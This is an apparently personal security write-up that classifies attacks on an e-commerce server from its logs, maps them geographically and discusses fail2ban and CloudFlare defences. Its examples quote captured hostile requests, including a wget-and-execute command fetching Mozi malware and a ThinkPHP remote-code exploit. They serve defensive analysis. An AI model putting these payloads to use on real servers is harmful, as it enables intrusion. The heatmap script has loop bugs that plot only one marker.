Figure 1. Heatmap showing the spectrum of attempted malicious activity targeting one of my servers in first month of operation.

Server Security Overview

- Andrey Znamensky, 2021


Abstract

Development of secure systems that store sensitive user information is vital to the sustenance of e-commerce platforms. Proper classification of malicious activity risk offers the insight required to allocate resources to take appropriate precautionary and remediative countermeasures to maximize security. The methods described will elucidate the behavior of malicious agents, accurately classify risk category, quantify risk level, and provide visualization of potential server weaknesses. Based on these results, an e-commerce business can properly adjust server filters on the basis of threat type, location, and severity, to improve accuracy of identification of suspicious (high risk) customer activity, while not affecting legitimate UX (user experience) and transactions, in order to minimize vulnerability and profitability loss.

Technology Summary

1. Classification of risk category was generated from parsing LAMP server logs in Python
2. Visualization was generated using:
- Basemap toolkit in Python
- Geographic mappings via ipinfo database

Background

Risk Level = 5
• Vulnerability scanners. The highest risk of the category, vulnerability scanners seek to exploit “zero-day” vulnerabilities on commonly used technologies. They scrape the web for e-commerce sites which use specific technologies. For example, in my case, Apache, MyPHPAdmin, and open-source e-commerce platforms, such as Magento and Saleor. They attempt to either login to these platforms, or execute malicious commands (e.g. via SQL injection) to extract user data on unpatched platforms. This activity is indicated with a red star on the visualization.

Examples:
> PHP Vulnerability Scanner
    IP - - [DATE +0000] "GET /TP/public/index.php HTTP/1.1" 403 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
    IP - - [DATE +0000] "GET /TP/index.php HTTP/1.1" 403 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
    IP - - [DATE +0000] "GET /thinkphp/html/public/index.php HTTP/1.1" 403 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
    IP - - [DATE +0000] "GET /html/public/index.php HTTP/1.1" 403 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
    IP - - [DATE +0000] "GET /public/index.php HTTP/1.1" 403 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
    IP - - [DATE +0000] "GET /TP/html/public/index.php HTTP/1.1" 403 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
    IP - - [DATE +0000] "GET /elrekt.php HTTP/1.1" 403 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
    ... 
> PHPmyadmin Vulnerability Scanner zmEu

    IP - - [DATE +0000] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 403 0 "-" "ZmEu"
    IP - - [DATE +0000] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 403 0 "-" "ZmEu"
    IP - - [DATE +0000] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 403 0 "-" "ZmEu"
    IP - - [DATE +0000] "GET /pma/scripts/setup.php HTTP/1.1" 403 0 "-" "ZmEu"
    IP - - [DATE +0000] "GET /myadmin/scripts/setup.php HTTP/1.1" 403 0 "-" "ZmEu"
    IP - - [DATE +0000] "GET /MyAdmin/scripts/setup.php HTTP/1.1" 403 0 "-" "ZmEu"
    ...
> Injection Attack (RCE attempt)
    IP - - [DATE +0000] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://ExternalIP:port/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 403 0 "-" "Hello, world"
> PHP Morpheus * Scanner (soapcaller.bs)
    IP - - [DATE +0000] "GET /user/soapCaller.bs – 403 0 <IP> "-" "Morfeus+F<Redacted>+Scanner"
> ThinkPHP vulnerability exploit attempt
    IP - - [DATE +0000] "GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1" 403 3554 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
    
Risk Level = 4
• Port Scanners / bruteforce. These connections constitute a higher risk score on the basis that they actively seek to gain access into the website databases, which could result in leakage of user data and severe disruption of business operation. They negatively affect load on server hardware as they traverse through common password lists attempting to log in on port 22 (SSH), or attempting to scan for unsecured ports and directories. However, with strong passwords, SSH keys, IP blocks on SSH login, and rate limiters, these attempts are merely a nuisance on hardware load as a successful brute-force attempt on a 13-char password with symbol, upper/lower-case chars, numbers would take longer than age of the universe to brute-force with our current technology.

Examples:
> Brute force dictionary attempt
    DATE AppacheHTTPServer sshd[PORT]: Disconnecting invalid user scan IP port ...: Change of username or service not allowed: (scan,ssh-connection) -> (service,ssh-connection) [preauth]
    DATE AppacheHTTPServer sshd[PORT]: Invalid user service from IP port ...
    DATE AppacheHTTPServer sshd[PORT]: Received disconnect from IP port ...:  [preauth]
    DATE AppacheHTTPServer sshd[PORT]: Disconnected from authenticating user root ... port ... [preauth]
    DATE AppacheHTTPServer sshd[PORT]: Invalid user service from ... port ...
    DATE AppacheHTTPServer sshd[PORT]: Invalid user shop from ... port ...
    DATE AppacheHTTPServer sshd[PORT]: Disconnecting invalid user shop ... port ...: Change of username or service not allowed: (shop,ssh-connection) -> (sshd,ssh-connection) [preauth]
    DATE AppacheHTTPServer sshd[PORT]: Invalid user steam from ... port ...
    ...
> Port Scanner
    IP - - [DATE +0000] "GET / HTTP/1.0" 403 0 "-" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
> Leakix Scanner
    IP - - [DATE +0000] "CONNECT leakix.net:443 HTTP/1.1" 403 0 "-" "Go-http-client/1.1"
Risk Level = 3
• DOS Attack. A nuisance on a larger scale, one of my servers sustained one DOS packet flood with 20,000 requests/minute. Since the attack came from one single IP in Gravelines, FR, we characterize it as a DOS, and not a DDOS (distributed). The IP is indicated with a lime green crosshair on the visualization. On this scale, the attack was merely vandalism; larger sites have sustained DDOS attacks on the order of >10^7 req/s. While I could not identify the motivation to DOS a small e-commerce site, DDOS attacks on e-commerce sites can be sometimes untargeted attempts to extort payment for resuming service.

Risk Level = 2
• Proxy Scanners. Scanning and attempted use of my servers as proxy server usage are mostly a nuisance risk by virtue of the hardware load being a negligible increase in electricity consumption or server hosting fees. However, given that 100% of these requests originate from abroad the USA to access blocked media or circumvent, this activity presents a legal liability risk if the user accesses a site that is blacklisted in USA. These requests are indicated in the visualization as lime green triangles.

Examples:
> Proxy attempt (probably mail spam)
    IP - - [DATE +0000] "CONNECT account.atresmedia.com:25 HTTP/1.1" 405 0 "-" "Java/1.8.0_271"
• Tor Traffic. While not causally related to intent to fraud in my logs, a clear correlation exists online between Tor traffic and illegitimate traffic. Legitimate shoppers are very unlikely to be using Tor. Furthermore, the JS-reliant elements of the site will be nonfunctional on Tor browser by default, and as such, Tor users are unable to complete transaction. Therefore, blocking Tor traffic represents 0 loss of potential revenue.

Risk Level = 1

• Non-HTTP/S traffic / invalid URI. This sort of traffic manifests when there is not HTTP request method. Data comes garbled form, most frequently octal/hex, e.g. (…/xHH/…), where HH is hexadecimal representation. User agent is always undefined. Could be attempt at buffer overflow, but most likely innocuous.
• VPN Traffic (white-listed): Known whitelisted VPNs are provided an extended captcha test, but do not inherently pose a serious security risk.
• Good Bots / crawlers: i.e. GoogleBot. While good bots generally present favorable opportunities for website SEO, GoogleBot, et. al. can spike server and bandwidth load for sites during archives for sites that host large quantities of public data (e.g. videos).

Risk Level = 0
• Legitimate traffic. Legitimate addresses which access the site, make transactions, or bounce. Does NOT include visitors on:
- known VPNs / proxies
- known IP blacklists
- Tor users
- known bots (good or bad)
- port scanning activity
- flooding activity
- proxy-scanning activity


Classification

Categorization. From the server logs, malicious agents can be categorized into the one of the following categories.
Risk Level Category Behavior/ Examples
5 Vulnerability scanners Scanning for unpatched versions of functions, trying to access env vars,SQL injections attempts
4 Brute Force logins Dictionary attack on port 22, or 80/443
3 DOS agent TCP Packet flood
2 proxy scanner Tor Traffic Port scanners Tor user agent/known nodes
1 Unknown / Neutral Non-HTTP/S, Noise, VPN traffic (white-listed) Good Bot (e.g. GoogleBot)
0 Legitimate traffic (everything else) makes transactions
Detection Methodology. The detection and extraction of these categories was automated from the server logs with the following principles:
  1. DOS: (D)DOS was identified by total contiguous requests / IP exceeding a threshold of 1000 REQ/min. A histogram was constructed with 60s interval and IP count was determined. Only one instance of DOS activity was identified.
  2. Proxy Scanner: Attempts to utilize server as proxy were identified by parsing unauthorized CONNECT requests, in addition to requests containing external URLs that originated from not good (whitelisted) bots.
  3. Vulnerability scanner: Vulnerability scanners were identified by the combination of automated and manual detection. Automated detection included: (1) name-matches for blacklisted user-agents, and (2) GET requests for directory access not in public list
  4. Dictionary attacks: Dictionary attacks were identified as any login attempts via SSH or to database modules originating from an external IP that utilized at least one attempt containing a dictionary word.

Visualization

Heatmap generation process for Fig. 1
1. The results of the detection above resulted in a CSV dataset with headers: [time, IP, threatType].
2. IP was expanded to: [longitude, latitude, country] with ipinfo API
3. Data is plotted onto Mercator projection in BaseMap
4. Cross sections of the map are partitioned
5. Histogram data is generated for each cross section
6. Corresponding density is mapped to a color dictionary (gradient) with LinearSegmentedColorMap
7. Heatmap colormesh is drawn with Gouraud polygonal shading


Remediation

Advantages and disadvantages to remedying the security risks with direct vs third party systems are described below.

1. Server-sided open source: e.g. fail2ban
2. Third party: e.g. CloudFlare

Initially, this framework was utilized for protection against brute force attacks and DDOS by configuring custom rules for jail time of malicious IPs. The policies manifest in the packet filter rule chains in the Linux kernel firewall (iptables). Fail2ban/Server Firewall utilized an average 10% latent CPU consumption parsing through long lists of blacklisted IPs. Additionally, it was desirable to filter IPs entirely from countries with > 90% fraud score, as their legitimate business was greatly outweighed by the risks. I initially utilized MaxMind GeoIP database for this purpose, but I did not have sufficient infrastructure to handle the combined load of additional procesing.

The primary motivations for adding a third party were:
(1) load distribution
(2) automated captcha pages

In the event of a DDOS attack, the nature may vary by request frequency and bandwidth consumption.

Before CloudFlare
- REQUEST LIMITATION: Without a third party, fail2ban would place any IP with over 10 req / second in a given time frame in a 60 min jail. Notably, this quantity may have to be adjusted depending on the type of e-commerce site and statistical performance in QA testing. For example, if testing shows that an average customer has a mean of 5 req / second, with a standard deviation of 1 req / second, then it may be appropriate to set limiter at 3-sigma level above the mean. For example, in this case 8 req / second limit would only throttle 0.3% of the customer population.
- BANDWIDTH LIMITATION: Additionally, any IP with over 60Mb/min consumption would be placed in a 60 min jail.

Assuming the max bandwidth consumption per req, the malicious IP would become bandwidth - limited before being rate (req) - limited. Assuming a bandwidth cap of 1Mbs/IP, and server costs of $0.01/Gb, a single IP can at maximum cause $0.00001 / s of cost, or approximately $0.03/hr. This quickly adds up with a distributed attack. Similar to request limits, the caps can be adjusted appropriately based on statistical performance of the historical values.

After CloudFlare
- With a cost of $0.05/10,000 req and req rate limiter (1hr time-outs), an attack from 1,000,000 unique IPs at 10req/s would be limited to $50/hr damage. An attack orchestrated just below the cap exceeding a threshold would auto-upgrade the defense level to display all users captcha tests.
- The third party carries the additional advantage of the 10% latent CPU reduction by processing all blacklists externally, which provides a more scalable solution for a growing business.

The diagram below shows my setup which has resulted in 0% observed incidence of events with risk level [2-5]. This indicates that the former attacks were most likely not targeted on the basis of keywords associated with my sites or products, but rather a result of bots scanning IP ranges. CloudFlare block logs indicate a similar distribution of attack absorption in terms of type and country of origin.
Responsive image

Opportunities for Improvement

Overlapping activity types. Our server logs indicated that categories 4-5 were entirely separate and automated. In other words, the visitor who scanned for vulnerabilities in a particular technology, did not attempt to brute-force any logins, and vice versa – the visitors who were brute-forcing logins, did not attempt to scan for vulnerabilities in the technologies themselves. Allowing the visualization to capture visitors who s imultaneously engaged in multiple categories of nefarious activities would be challenging in a balanced risk score computation.

Low resolution. Density mapping in Basemap, even with resolution parameter set to ‘h’ (high), relies on Gouraud shading of polygon meshes mapped to the histogram of latitude and longitude bins, does not come out looking very smooth. If the user zooms in on the high resolution rendition, they will be able to see the rough outlines of the small polygons.
Future work will involve a gmaps/gmplot zoomable implementation, with post-processing to generate overlay marker types, and overlay of country .shp (shape) polygons to shade countries by risk score.

Outlier detection X-Forwarded-For IP Headers are currently being properly resolved from CloudFlare to origin IPs. A potential opportunity for improvement would be to collects and merge additional data (e.g. mouse cursor time series data, cookie data) to improve quantification of risk score for categories 0-2.

Source


"""
Created on Sat Mar 13 23:36:26 2021
@author: Znamensky 2021
heatmap.py - builds heatmap from weight-adjusted data using basemap and matplotlib libs
"""
# -*- coding: utf-8 -*-

import numpy as np
import matplotlib.pyplot as plt
import matplotlib.colors
from mpl_toolkits.basemap import Basemap
import pandas
from matplotlib.colors import LinearSegmentedColormap

import ipinfo
def getGeo(ip):
"""
Retrieves geographic location given an IP using ipinfo database.
Data includes country, city, longitude, and latitude in handler.
This function is included for demonstration purposes, and is intended
to be executed within a loop to process large IP datasets.
"""
    access_token = '<YOURTOKEN>'
    handler = ipinfo.getHandler(access_token)
    ip_address = '<IP>'
    details = handler.getDetails(ip_address)
    #city = details.city
    #country = details.country
    #loc = details.loc
    #print(city,country,loc)
    return handler

#EXTRACT DATA FROM CSV
colnames = ['lat','lon']
data = pandas.read_csv('data.csv', names=colnames)
a = data.lat.tolist()
b = data.lon.tolist()
a_list = []
b_list = []

for i in range(1,len(a)):
    a_element = float(a[i])
    b_element = float(b[i])
    a_list.append(a_element) #lats
    b_list.append(b_element) #lons

#BASEMAP INITALIZATION (merc projection, (l)ow quality res)
m = Basemap(projection='merc',llcrnrlat=-82,urcrnrlat=82,\
llcrnrlon=-180,urcrnrlon=180, resolution = 'l')

#CREATE HISTOGRAM
nx = 90
ny = nx//2
lon_bins = np.linspace(-180, 180, nx)
lat_bins = np.linspace(-90, 90, ny)

density, lat_edges, lon_edges = np.histogram2d(a_list, b_list, [lat_bins, lon_bins])
lon_bins_2d, lat_bins_2d = np.meshgrid(lon_bins, lat_bins)

xs, ys = m(lon_bins_2d, lat_bins_2d)

# GRADIENT (WHITE -> YELLOW -> ORANGE -> RED)
cdict = {'red':  ((0.0, 1.0, 1.0),
(0.5, 1.0, 1.0),
(0.5, 0.64, 1.0),

(1.0, 0.8, 0.8)),

'green': ((0.0, 1.0, 1.0),
(0.5, 1.0, 1.0),
(0.5, 0.64, 1.0),
(1.0, 0.0, 0.0)),

'blue':  ((0.0, 1.0, 1.0),
(0.5, 0.0, 1.0),
(0.5, 0.64, 0.0),
(1.0, 0.0, 0.0))
}

# LINEAR SEGMENTED COLORMAP
custom_map = LinearSegmentedColormap('custom_map', cdict)
plt.register_cmap(cmap=custom_map)

density = np.hstack((density,np.zeros((density.shape[0],1))))
density = np.vstack((density,np.zeros((density.shape[1]))))


# PLOT GOURAUD HEAT MAP
plt.pcolormesh(xs, ys, density, cmap="custom_map", shading='gouraud')

# COLORBAR
cbar = plt.colorbar(orientation='horizontal', shrink=0.625, aspect=20)
cbar.set_label('Risk Score',size=18)

# DRAW COUNTRIES AND COASTLINES
m.drawcountries(linewidth=0.3, linestyle='solid', color= 'black')
m.drawcoastlines(linewidth=0.3, linestyle='solid', color= 'black')

#heatmap data
x,y = m(b_list, a_list)

#DOS
xi,yi = m(2.1281,50.9865)
m.plot(xi,yi,'+', markersize = 50.0, zorder = 20, markerfacecolor='#00FF1F', markeredgecolor="#00FF1F", alpha = 1.0 )

#GFW
gfw_lon = [32.0617,39.9075,31.3041,30.2936,23.1167,30.6667,31.2222,34.1213,29.5603,32.0422,34.2044,22.5455,38.0414,40.919,28.1987,24.4798]
gfw_lat = [118.7778,116.3972,120.5954,120.1614,113.25,104.0667,121.4581,118.7808,106.5577,112.1448,117.2839,114.0683,114.4786,110.3831,112.9709,118.0819]
for i in range(len(gfw_lon)):
    yiValue = gfw_lon[i]
    xiValue = gfw_lat[i]
xi,yi = m(xiValue,yiValue)
m.plot(xi,yi,'^', markersize = 6.0, zorder = 10, markerfacecolor='#00FF1F'  )

#VULNERABILITY
vuln_lon = [37.3483,30.2936,30.6667,39.9075,32.0617,31.2222,34.1213,40.8043,52.374,13.2257,10.369]
vuln_lat = [-121.9844,120.1614,104.0667,116.3972,118.7778,121.4581,118.7808,-74.0121,4.8897,77.575,77.9804]
for i in range(len(vuln_lon)):
    yiValue = vuln_lon[i]
    xiValue = vuln_lat[i]
xi,yi = m(xiValue,yiValue)
m.plot(xi,yi,'*', markersize = 12.0, zorder = 10, markerfacecolor='#FF0000'  )

# ENLARGE and SHOW
plt.gcf().set_size_inches(20,20)
plt.show()